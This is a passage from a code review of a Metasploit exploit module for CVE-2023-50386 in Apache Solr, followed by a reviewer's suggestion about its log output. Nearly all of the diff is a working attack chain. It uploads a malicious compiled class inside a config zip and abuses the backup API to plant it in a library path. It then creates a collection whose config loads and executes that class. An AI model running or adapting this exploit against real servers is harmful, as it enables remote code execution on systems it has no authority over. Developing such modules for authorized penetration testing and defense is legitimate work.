modules/exploits/linux/http/apache_solr_backup_restore.rb

```diff
@@ -0,0 +1,374 @@
+    else
+      fail_with(Failure::UnexpectedReply, "Failed to create collection: #{collection_name} successfully")
+    end
+  end
+
+  def exploit
+    collection1_name = Rex::Text.rand_text_alpha(8)
+    configuration1_name = Rex::Text.rand_text_alpha_lower(8)
+    collection2_name = Rex::Text.rand_text_alpha(8)
+
+    begin
+      # Zip up conf1
+      conf1_zip = create_zip
+      conf1_zip.add_file('SourceParser.class', go_go_gadget(configuration1_name))
+      conf1_zip.add_file('solrconfig.xml', File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-50386', 'solrconfig.xml')))
+
+      # Upload conf1
+      upload_conf(configuration1_name + '.zip', conf1_zip.pack, configuration1_name)
+
+      # Create collection from conf1
+      res = create_collection(collection1_name, configuration1_name)
+
+      fail_with(Failure::UnexpectedReply, 'No response from the target') unless res
+      data = res.get_json_document
+      if res.code == 200 && data['responseHeader']['status'] == 0
+        vprint_good('Created collection successfully')
+      elsif data['error']['msg']
+        fail_with(Failure::UnexpectedReply, "Failed to upload configuration. Target responded with error: #{data['error']['msg']}")
+      else
+        fail_with(Failure::UnexpectedReply, "Failed to create collection: #{collection_name} successfully")
+      end
+
+      # Backup collection and export conf1
+      location = '/var/solr/data/'
+      backup_name = "#{collection2_name}_shard1_replica_n1"
+      backup_collection(collection1_name, location, backup_name)
+
+      # Now you need to export it again through the backup and interface `collection1` note the changes in `location` and `name`:
+      location = "/var/solr/data/#{backup_name}"
+      backup_name = 'lib'
+      backup_collection(collection1_name, location, backup_name)
+
+      # Zip up conf2
+      conf2_zip = create_zip
+      editted_solrconfig = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-50386', 'solrconfig.xml'))
+      editted_solrconfig = editted_solrconfig.gsub('</config>', "     <valueSourceParser name=\"myfunc\" class=\"zk_backup_0.configs.#{configuration1_name}.SourceParser\" />\n</config>")
+      conf2_zip.add_file('solrconfig.xml', editted_solrconfig)
+
+      # Upload conf2
+      configuration2_name = Rex::Text.rand_text_alpha(8)
+      upload_conf('conf2.zip', conf2_zip.pack, configuration2_name)
+
+      # Create collection from conf2 which will load the SourceParser.class we uploaded as a port of the first conf1
+      # which will then execute our malicious class
+      res = create_collection(collection2_name, configuration2_name)
+
+      fail_with(Failure::UnexpectedReply, 'No response from the target') unless res
+      data = res&.get_json_document
+      if res.code == 400 && data['error']['msg'] == "Underlying core creation failed while creating collection: #{collection2_name}"
+        vprint_good('Successfully dropped the payload')
```

Comment:
There's not a lot of output in this method. This is a pretty important step so I'd recommend printing it regardless of the verbose setting.
```suggestion
        print_good('Successfully dropped the payload')
```